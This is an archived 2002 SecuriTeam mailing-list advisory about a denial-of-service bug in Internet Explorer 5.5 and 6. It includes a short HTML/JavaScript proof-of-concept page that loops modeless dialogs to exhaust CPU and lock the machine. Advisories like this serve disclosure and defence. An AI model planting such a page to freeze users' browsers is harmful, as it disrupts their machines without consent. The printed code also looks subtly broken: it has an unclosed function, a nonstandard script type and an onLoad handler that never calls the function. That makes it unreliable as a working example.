[NT] Internet Explorer JavaScript Modeless Popup DoS
From: support@securiteam.comDate: 01/13/02
- Previous message: support@securiteam.com: "[NEWS] Vulnerabilities in Oracle9iAS Web Cache"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 13 Jan 2002 12:23:03 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Internet Explorer JavaScript Modeless Popup DoS
------------------------------------------------------------------------
SUMMARY
There is a bug in Internet Explorer 6 (probably lower versions down to 5.0
as well) that allows for a JavaScript to call an infinite amount of
modeless dialogs containing the page it was opened in, thus creating an
endless loop and rendering the internet explorer useless. These dialogs
also managed to stay open after killing the 'iexplore' process and
continued to loop until CPU usage was maxed at 100%. Due to the nature of
the showModelessDialog() function, the dialog fails to give up focus and
the machine may even become unable to function requiring a reboot of the
machine to regain control of the user interface.
DETAILS
Vulnerable systems:
Internet Explorer version 6.0
Internet Explorer version 5.5
Example:
Place this Code into an HTML file called exploit.html:
<html>
<head>
<script type="javascript">
function exploit() {
while(1) {
showModelessDialog("exploit.html");
}
</script>
</head>
<body onLoad="exploit">
</body>
</html>
Workaround:
Disable JavaScript.
ADDITIONAL INFORMATION
The information has been provided by <mailto:whizack@attbi.com> Lance
Hitch*** Jr..
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Vulnerabilities in Oracle9iAS Web Cache"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
